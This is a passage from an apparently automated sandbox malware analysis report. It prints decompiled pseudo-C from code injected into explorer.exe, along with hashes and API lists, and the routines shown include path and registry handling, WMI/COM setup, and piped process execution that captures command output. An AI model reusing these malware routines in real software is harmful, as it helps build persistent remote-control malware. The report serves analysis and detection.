						if(_t29 != _t45) {
							E000C8706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0xd09b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














        0x000d2125
        0x000d212a
        0x000d212e
        0x000d212e
        0x000d2133
        0x000d2138
        0x000d2139
        0x000d213c
        0x000d213d
        0x000d2142
        0x000d2145
        0x000d2146
        0x000d214b
        0x000d2152
        0x000d21f8
        0x000d21f8
        0x00000000
        0x000d2161
        0x000d2161
        0x000d2168
        0x000d216c
        0x000d2173
        0x000d217c
        0x000d217e
        0x000d217e
        0x000d217c
        0x000d218d
        0x000d21b3
        0x000d21bc
        0x000d21be
        0x000d21c4
        0x000d21f3
        0x000d21f3
        0x000d21fb
        0x000d21fe
        0x000d21fe
        0x000d21c6
        0x000d21c7
        0x000d21cd
        0x000d21cf
        0x000d21cf
        0x000d21d4
        0x000d21d3
        0x000d21d3
        0x000d21db
        0x000d21e7
        0x000d21f1
        0x000d21f1
        0x00000000
        0x000d219d
        0x000d219d
        0x000d219d
        0x000d21a3
        0x00000000
        0x00000000
        0x000d21a5
        0x000d21ab
        0x000d21b0
        0x00000000
        0x000d21b0
        0x000d218d

        APIs
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: strchr$_snprintflocaleconv
        • String ID: %.*g
        • API String ID: 1910550357-952554281
        • Opcode ID: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
        • Instruction ID: f6153b53931c816f5cf90fdbc4519a87119c60c3e64c05486d80ffcae23a6d65
        • Opcode Fuzzy Hash: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
        • Instruction Fuzzy Hash: B721337B6447427AD7254A289CC6BBA7BCCDF75320F158117FE109A382EA74EC4093B0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D02B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: _snprintfqsort
        • String ID: %I64d$false$null$true
        • API String ID: 756996078-4285102228
        • Opcode ID: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
        • Instruction ID: 684f5bda4ccecb9397834d04cf382ea593694727c20340f8e6e8807afc758164
        • Opcode Fuzzy Hash: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
        • Instruction Fuzzy Hash: 9EE16DB190030ABBDF119F64DC46FEF3BA9EF55344F10801AFD1996242EA31DA619BB0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C4A0B, Relevance: 9.3, APIs: 6, Instructions: 285stringCOMMON
        Download Yara Rule
        C-Code - Quality: 79%
        			E000C4A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0xde688; // 0xf0000
					_t125 =  *0xde68c; // 0x280fab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E000CBB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E000CB7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E000CB67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000C49C7( &_v1076,  &_v1076, _t206);
					_t141 = E000CD400( &_v1076, E000CC379( &_v1076), 0);
					E000CB88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E000C2C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000C92E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0xde688; // 0xf0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000C91E3(_v1112);
								_t145 = _t130;
								 *0xde740 = _t76;
								 *0xde738 = E000C91E3(_t145);
								L17:
								_push(_t145);
								_t188 = E000C9B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0xdb9ca);
								E000C9F48(0xe);
								E000C9F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E000CA0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E000CA3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E000CA3ED(_t188, _t180, _t208);
								}
								_t87 = E000C980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E000CA0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0xde688; // 0xf0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E000CFC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0xde688; // 0xf0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E000CE23E(_t183);
										}
										E000C52C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0xde688; // 0xf0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E000C109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000C85D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xf0228
									_t153 = _t51;
									L25:
									_t90 = E000C553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0xde688; // 0xf0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E000CC292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0xde684; // 0x280f8f0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0xde684; // 0x280f8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E000C861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E000C861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E000CE286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000C95E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E000CBFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000C85D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E000C2BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}































































        0x000c4a0b
        0x000c4a18
        0x000c4a23
        0x000c4a28
        0x000c4a2a
        0x000c4a2d
        0x000c4a32
        0x000c4a35
        0x000c4a3f
        0x000c4a41
        0x000c4a4e
        0x000c4a57
        0x000c4a57
        0x000c4a64
        0x000c4a7f
        0x000c4a86
        0x000c4a88
        0x000c4a8d
        0x000c4a92
        0x000c4a98
        0x000c4aa7
        0x000c4ac6
        0x000c4ac8
        0x000c4ace
        0x000c4ad4
        0x000c4ad9
        0x000c4add
        0x000c4ae0
        0x000c4aea
        0x000c4aec
        0x000c4aed
        0x000c4af8
        0x000c4afa
        0x000c4afd
        0x000c4b02
        0x000c4b09
        0x000c4b5e
        0x000c4b5e
        0x000c4b63
        0x000c4bca
        0x000c4bcf
        0x000c4bd1
        0x000c4bdb
        0x000c4be0
        0x000c4be0
        0x000c4bfa
        0x000c4bfc
        0x000c4bff
        0x000c4c01
        0x00000000
        0x00000000
        0x000c4c07
        0x000c4c11
        0x000c4c1a
        0x000c4c1f
        0x000c4c22
        0x000c4c28
        0x000c4c2e
        0x000c4c36
        0x000c4c38
        0x000c4c3b
        0x000c4c3c
        0x000c4c41
        0x000c4c44
        0x000c4c47
        0x000c4c49
        0x000c4c4d
        0x000c4c4d
        0x000c4c52
        0x000c4c55
        0x000c4c57
        0x000c4c5b
        0x000c4c5b
        0x000c4c62
        0x000c4c67
        0x000c4c69
        0x000c4c6d
        0x000c4c6f
        0x000c4c75
        0x000c4c79
        0x000c4c7c
        0x000c4c7d
        0x000c4c82
        0x000c4c85
        0x000c4c8a
        0x000c4cb2
        0x000c4cb8
        0x000c4cbf
        0x000c4cce
        0x000c4cd3
        0x00000000
        0x000c4cd3
        0x000c4cc1
        0x00000000
        0x000c4c8c
        0x000c4c8c
        0x000c4c91
        0x000c4c98
        0x000c4cdd
        0x000c4cdd
        0x000c4ce4
        0x000c4ce8
        0x000c4ce9
        0x000c4ce9
        0x000c4cf3
        0x000c4cf8
        0x000c4cfb
        0x000c4cfc
        0x000c4cfe
        0x000c4d00
        0x000c4d05
        0x000c4d0c
        0x000c4d4f
        0x000c4d0e
        0x000c4d13
        0x000c4d1b
        0x000c4d1f
        0x000c4d2a
        0x000c4d35
        0x000c4d3d
        0x000c4d41
        0x000c4d49
        0x000c4d49
        0x000c4d0c
        0x000c4d55
        0x000c4d58
        0x000c4d5a
        0x000c4d60
        0x000c4d60
        0x000c4d62
        0x000c4d62
        0x00000000
        0x000c4d62
        0x000c4c9a
        0x000c4c9a
        0x000c4ca0
        0x000c4ca2
        0x000c4ca7
        0x000c4ca7
        0x000c4ca9
        0x000c4cd8
        0x00000000
        0x000c4cd8
        0x000c4cab
        0x000c4ae4
        0x000c4ae4
        0x00000000
        0x000c4ae4
        0x000c4c8a
        0x000c4b69
        0x000c4b77
        0x000c4b8a
        0x000c4b8f
        0x000c4b95
        0x000c4b97
        0x000c4baf
        0x000c4bb4
        0x000c4bbd
        0x000c4bc3
        0x00000000
        0x000c4bc3
        0x000c4b9f
        0x000c4ba8
        0x00000000
        0x000c4ba8
        0x000c4b0b
        0x000c4b11
        0x000c4b13
        0x000c4b51
        0x000c4b53
        0x00000000
        0x00000000
        0x000c4b55
        0x000c4b59
        0x00000000
        0x000c4b59
        0x000c4b15
        0x000c4b1f
        0x000c4b2b
        0x000c4b36
        0x000c4b3d
        0x000c4b47
        0x000c4b4c
        0x00000000
        0x000c4b4c
        0x000c4ae2
        0x00000000
        0x000c4a66
        0x000c4a71
        0x000c4a77
        0x000c4a79
        0x000c4d64
        0x000c4d64
        0x000c4d66
        0x000c4d6c
        0x000c4d6c
        0x00000000
        0x000c4a79

        APIs
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: lstrcat$lstrcpy$memset
        • String ID:
        • API String ID: 1985475764-0
        • Opcode ID: 25e48525813f93615fde0145167042318559483661b4c5997eb0984318512aa9
        • Instruction ID: e00079e0afd43232e147177fe6b1363a575de2813d944f784ff1f94eb2fb20e0
        • Opcode Fuzzy Hash: 25e48525813f93615fde0145167042318559483661b4c5997eb0984318512aa9
        • Instruction Fuzzy Hash: BE91AC71604300AFE754EB20D896FBE73E9BB84720F14492EF9558B2D2EB74DD048B52
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CD748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
        Download Yara Rule
        APIs
        • SysAllocString.OLEAUT32(00000000), ref: 000CD75C
        • SysAllocString.OLEAUT32(?), ref: 000CD764
        • SysAllocString.OLEAUT32(00000000), ref: 000CD778
        • SysFreeString.OLEAUT32(?), ref: 000CD7F3
        • SysFreeString.OLEAUT32(?), ref: 000CD7F6
        • SysFreeString.OLEAUT32(?), ref: 000CD7FB
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: String$AllocFree
        • String ID:
        • API String ID: 344208780-0
        • Opcode ID: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
        • Instruction ID: 3d9f34c9eecb127b5d7570106aa8ec4b723249f91a2853b660b7b91b34ec35e3
        • Opcode Fuzzy Hash: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
        • Instruction Fuzzy Hash: 5A21F875900218BFDB10DFA5CC88DAFBBBDEF48354B1044AAF505A7250EA71AE01CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D07F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID: @$\u%04X$\u%04X\u%04X
        • API String ID: 0-2132903582
        • Opcode ID: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
        • Instruction ID: 3547e2d1494ab77912d377d0d288dcf2f58bd85626a5821c1112c12d5c5f1659
        • Opcode Fuzzy Hash: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
        • Instruction Fuzzy Hash: C5412C31600305A7EF785A68CC69BFEAA98DF84350F240027F98DD6356D661CD9197F1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CD523, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
        Download Yara Rule
        C-Code - Quality: 30%
        			E000CD523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0xdb848, 0, 1, 0xdb858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E000C8604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













        0x000cd530
        0x000cd533
        0x000cd536
        0x000cd547
        0x000cd54d
        0x000cd55e
        0x000cd566
        0x000cd5b7
        0x000cd5b7
        0x000cd5bc
        0x000cd5c1
        0x000cd5c1
        0x000cd5c4
        0x000cd5c9
        0x000cd5ce
        0x000cd5ce
        0x000cd5d1
        0x000cd568
        0x000cd569
        0x000cd56f
        0x000cd580
        0x000cd585
        0x00000000
        0x000cd587
        0x000cd594
        0x000cd59c
        0x00000000
        0x000cd59e
        0x000cd5a0
        0x000cd5a8
        0x00000000
        0x000cd5aa
        0x000cd5ad
        0x000cd5b3
        0x000cd5b3
        0x000cd5a8
        0x000cd59c
        0x000cd585
        0x000cd5d6

        APIs
        • CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
        • CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
        • SysAllocString.OLEAUT32(00000000), ref: 000CD569
        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
        • String ID:
        • API String ID: 1610782348-0
        • Opcode ID: 05ab0c0f64f303f71bbde7eec5c3099c89def3f6aef423da56ef5a12d5b49738
        • Instruction ID: b52495c3964bc2eee305646e62cfc807d5bb65c34ee2dbb5966ceb0035954956
        • Opcode Fuzzy Hash: 05ab0c0f64f303f71bbde7eec5c3099c89def3f6aef423da56ef5a12d5b49738
        • Instruction Fuzzy Hash: 3821EA74601245BFEB249B66DC4DE6FBFBCEFC6B15F10416EB901A6290DA709A01CB30
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D21FF, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
        Download Yara Rule
        C-Code - Quality: 79%
        			E000D21FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000D22CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L000D2291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0xd8250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L000D2291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0xd8258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











        0x000d21ff
        0x000d2207
        0x000d220c
        0x000d220f
        0x000d2214
        0x000d221a
        0x000d2223
        0x000d2227
        0x000d2227
        0x000d2223
        0x000d2229
        0x000d222e
        0x000d2237
        0x000d223c
        0x000d223f
        0x000d2248
        0x000d224a
        0x000d2251
        0x000d2262
        0x000d2262
        0x000d2264
        0x000d226c
        0x000d2273
        0x00000000
        0x000d226e
        0x000d2272
        0x000d2272
        0x000d2253
        0x000d2253
        0x000d2259
        0x000d225b
        0x000d2260
        0x000d2276
        0x000d2279
        0x000d227e
        0x00000000
        0x00000000
        0x00000000
        0x000d2260

        APIs
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: _errno$localeconvstrchrstrtod
        • String ID:
        • API String ID: 1035490122-0
        • Opcode ID: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
        • Instruction ID: 02ad6d30cf94f535e5970a8dc70227cda6efb6bc9110fd6e31c748a412764503
        • Opcode Fuzzy Hash: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
        • Instruction Fuzzy Hash: A7012435804305FADB122F25E9026FD3BA4AFAA360F2041C2F980672A2CB358854DBB4
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
        Download Yara Rule
        C-Code - Quality: 73%
        			E000CA9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E000C861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0xde684; // 0x280f8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0xde684; // 0x280f8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E000C8604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0xde684; // 0x280f8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0xde684; // 0x280f8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0xde684; // 0x280f8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0xde684; // 0x280f8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000C91A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E000C9292(_t127);
						E000C861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E000CC379(_t127));
				_t98 =  *0xde68c; // 0x280fab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0xde684; // 0x280f8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0xde684; // 0x280f8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E000C9256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E000C861A( &_v32, 0);
				return _t128;
			}




































        0x000ca9c2
        0x000ca9c4
        0x000ca9d0
        0x000ca9d5
        0x000ca9d8
        0x000ca9da
        0x000ca9dd
        0x000ca9e0
        0x000ca9e7
        0x000ca9ea
        0x000ca9f1
        0x000ca9f4
        0x000ca9fe
        0x000ca9ff
        0x000caa02
        0x000caa04
        0x000caa05
        0x000caa1c
        0x000cab9c
        0x00000000
        0x000cab9c
        0x000caa33
        0x000cab68
        0x000cab6e
        0x000cab79
        0x000cab7b
        0x000cab83
        0x000cab83
        0x000cab8a
        0x000cab8c
        0x000cab95
        0x000cab95
        0x00000000
        0x000cab98
        0x000caa39
        0x000caa3c
        0x000caa3f
        0x000caa45
        0x000caa4f
        0x000caa59
        0x000caa60
        0x000caa69
        0x000caa6b
        0x000caa71
        0x00000000
        0x00000000
        0x000caa7c
        0x000caa83
        0x000caa84
        0x000caa89
        0x000caa8a
        0x000caa8b
        0x000caa90
        0x000caa92
        0x000caa93
        0x000caa94
        0x000caa97
        0x000caa9d
        0x00000000
        0x00000000
        0x000caaa3
        0x000caaab
        0x000caaae
        0x000caab6
        0x000caab9
        0x000caabc
        0x000caac2
        0x000caad6
        0x000caadc
        0x000caae2
        0x000cab0b
        0x000caae4
        0x000caae4
        0x000caae6
        0x000caae8
        0x000caaf0
        0x000caaf8
        0x000caafd
        0x000caafd
        0x000cab11
        0x000cab13
        0x000cab13
        0x000cab1b
        0x000cab23
        0x000cab24
        0x000cab29
        0x000cab32
        0x000cab52
        0x000cab52
        0x000cab5a
        0x000cab5d
        0x000cab65
        0x00000000
        0x000cab65
        0x000cab3b
        0x000cab3f
        0x00000000
        0x00000000
        0x000cab47
        0x00000000

        APIs
        • memset.MSVCRT ref: 000CA9F4
        • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 000CAA18
        • CreatePipe.KERNEL32(000C65A9,?,0000000C,00000000), ref: 000CAA2F
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateHeapPipe$AllocateFreememset
        • String ID: D
        • API String ID: 2365139273-2746444292
        • Opcode ID: 9a2e551b63c43dc9543f3e7ae316adbf9ccf312437153ee1b23a49d91da7ae79
